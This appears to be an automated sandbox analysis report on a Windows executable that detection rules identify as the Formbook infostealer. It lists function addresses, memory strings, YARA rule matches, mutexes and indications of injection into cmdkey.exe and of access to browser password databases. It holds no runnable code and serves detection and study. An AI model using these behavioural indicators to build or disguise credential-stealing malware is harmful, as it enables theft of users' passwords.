            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190CB54_2_01190CB5
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0CF24_2_010E0CF2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01110F304_2_01110F30
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01192F304_2_01192F30
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01132F284_2_01132F28
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01164F404_2_01164F40
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116EFA04_2_0116EFA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E2FC84_2_010E2FC8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FCFE04_2_010FCFE0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AEE264_2_011AEE26
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0E594_2_010F0E59
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102E904_2_01102E90
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011ACE934_2_011ACE93
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AEEDB4_2_011AEEDB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011BB16B4_2_011BB16B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112516C4_2_0112516C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DF1724_2_010DF172
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FB1B04_2_010FB1B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F70C04_2_010F70C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119F0CC4_2_0119F0CC
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A70E94_2_011A70E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AF0E04_2_011AF0E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A132D4_2_011A132D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DD34C4_2_010DD34C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0113739A4_2_0113739A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F52A04_2_010F52A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110B2C04_2_0110B2C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011912ED4_2_011912ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A75714_2_011A7571
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118D5B04_2_0118D5B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B95C34_2_011B95C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AF43F4_2_011AF43F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E14604_2_010E1460
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AF7B04_2_011AF7B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011356304_2_01135630
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A16CC4_2_011A16CC
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011859104_2_01185910
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110B9504_2_0110B950
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F99504_2_010F9950
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115D8004_2_0115D800
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F38E04_2_010F38E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AFB764_2_011AFB76
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110FB804_2_0110FB80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01165BF04_2_01165BF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112DBF94_2_0112DBF9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AFA494_2_011AFA49
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A7A464_2_011A7A46
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01163A6C4_2_01163A6C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01135AA04_2_01135AA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118DAAC4_2_0118DAAC
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01191AA34_2_01191AA3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119DAC64_2_0119DAC6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A1D5A4_2_011A1D5A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F3D404_2_010F3D40
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A7D734_2_011A7D73
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110FDC04_2_0110FDC0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01169C324_2_01169C32
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AFCF24_2_011AFCF2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AFF094_2_011AFF09
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F1F924_2_010F1F92
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AFFB14_2_011AFFB1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010B3FD24_2_010B3FD2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010B3FD54_2_010B3FD5
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F9EB04_2_010F9EB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359A3528_2_0359A352
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035A03E68_2_035A03E6
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034EE3F08_2_034EE3F0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035802748_2_03580274
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035602C08_2_035602C0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035681588_2_03568158
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034D01008_2_034D0100
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0357A1188_2_0357A118
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035981CC8_2_035981CC
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035A01AA8_2_035A01AA
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035941A28_2_035941A2
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035720008_2_03572000
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035047508_2_03504750
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E07708_2_034E0770
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034DC7C08_2_034DC7C0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034FC6E08_2_034FC6E0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E05358_2_034E0535
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035A05918_2_035A0591
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035924468_2_03592446
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035844208_2_03584420
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0358E4F68_2_0358E4F6
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359AB408_2_0359AB40
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03596BD78_2_03596BD7
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034DEA808_2_034DEA80
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034F69628_2_034F6962
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E29A08_2_034E29A0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035AA9A68_2_035AA9A6
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E28408_2_034E2840
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034EA8408_2_034EA840
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0350E8F08_2_0350E8F0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034C68B88_2_034C68B8
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03554F408_2_03554F40
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03500F308_2_03500F30
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03582F308_2_03582F30
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03522F288_2_03522F28
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034D2FC88_2_034D2FC8
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034ECFE08_2_034ECFE0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0355EFA08_2_0355EFA0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E0E598_2_034E0E59
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359EE268_2_0359EE26
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359EEDB8_2_0359EEDB
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359CE938_2_0359CE93
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034F2E908_2_034F2E90
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0357CD1F8_2_0357CD1F
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034EAD008_2_034EAD00
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034DADE08_2_034DADE0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034F8DBF8_2_034F8DBF
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E0C008_2_034E0C00
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034D0CF28_2_034D0CF2
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03580CB58_2_03580CB5
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034CD34C8_2_034CD34C
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359132D8_2_0359132D
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0352739A8_2_0352739A
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034FB2C08_2_034FB2C0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035812ED8_2_035812ED
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E52A08_2_034E52A0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035AB16B8_2_035AB16B
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0351516C8_2_0351516C
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034CF1728_2_034CF172
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034EB1B08_2_034EB1B0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E70C08_2_034E70C0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0358F0CC8_2_0358F0CC
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035970E98_2_035970E9
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359F0E08_2_0359F0E0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359F7B08_2_0359F7B0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035916CC8_2_035916CC
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035975718_2_03597571
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0357D5B08_2_0357D5B0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034D14608_2_034D1460
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359F43F8_2_0359F43F
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359FB768_2_0359FB76
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03555BF08_2_03555BF0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0351DBF98_2_0351DBF9
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034FFB808_2_034FFB80
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359FA498_2_0359FA49
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03597A468_2_03597A46
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03553A6C8_2_03553A6C
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0358DAC68_2_0358DAC6
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03525AA08_2_03525AA0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0357DAAC8_2_0357DAAC
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03581AA38_2_03581AA3
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E99508_2_034E9950
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034FB9508_2_034FB950
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035759108_2_03575910
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0354D8008_2_0354D800
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E38E08_2_034E38E0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359FF098_2_0359FF09
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E1F928_2_034E1F92
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359FFB18_2_0359FFB1
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E9EB08_2_034E9EB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03591D5A8_2_03591D5A
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034E3D408_2_034E3D40
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03597D738_2_03597D73
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034FFDC08_2_034FFDC0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03559C328_2_03559C32
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0359FCF28_2_0359FCF2
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A117008_2_00A11700
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A0C6608_2_00A0C660
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A0C6578_2_00A0C657
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A0C8808_2_00A0C880
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A0A9008_2_00A0A900
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A14D708_2_00A14D70
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A12F4D8_2_00A12F4D
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A12F508_2_00A12F50
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A2B2F08_2_00A2B2F0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0333E3F38_2_0333E3F3
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0333E2D48_2_0333E2D4
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0333E78C8_2_0333E78C
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0333D7F88_2_0333D7F8
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0333CA3C8_2_0333CA3C
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_0333CA988_2_0333CA98
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: String function: 01125130 appears 58 times
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: String function: 0116F290 appears 105 times
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: String function: 010DB970 appears 277 times
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: String function: 01137E54 appears 111 times
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: String function: 0115EA12 appears 86 times
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03515130 appears 58 times
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0354EA12 appears 86 times
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 034CB970 appears 277 times
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03527E54 appears 102 times
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0355F290 appears 105 times
            Source: r9856_7.exe, 00000000.00000002.1379686712.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1386515318.000000000417B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1389470977.0000000007610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1389160167.0000000007270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1385826227.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000000.1347472696.0000000000D30000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedjdH.exeN vs r9856_7.exe
            Source: r9856_7.exe, 00000004.00000002.1544042042.00000000011DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs r9856_7.exe
            Source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdkey.exej% vs r9856_7.exe
            Source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdkey.exej% vs r9856_7.exe
            Source: r9856_7.exeBinary or memory string: OriginalFilenamedjdH.exeN vs r9856_7.exe
            Source: r9856_7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: r9856_7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, yLcVqjAhUsybQFpIrK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, yLcVqjAhUsybQFpIrK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, yLcVqjAhUsybQFpIrK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.AddAccessRule
            Source: NhrnLLOsLetD.exe, 0000000A.00000000.1611606614.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3816401592.00000000015E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@18/14
            Source: C:\Users\user\Desktop\r9856_7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\r9856_7.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
            Source: C:\Users\user\Desktop\r9856_7.exeMutant created: \Sessions\1\BaseNamedObjects\sRtztJgpshoJwYqdrdu
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw53lp0l.1lv.ps1Jump to behavior
            Source: r9856_7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: r9856_7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\r9856_7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cmdkey.exe, 00000008.00000002.3814752917.000000000300D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1734763644.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3814752917.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1736190674.000000000300D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1736190674.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1734866064.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r9856_7.exeReversingLabs: Detection: 63%
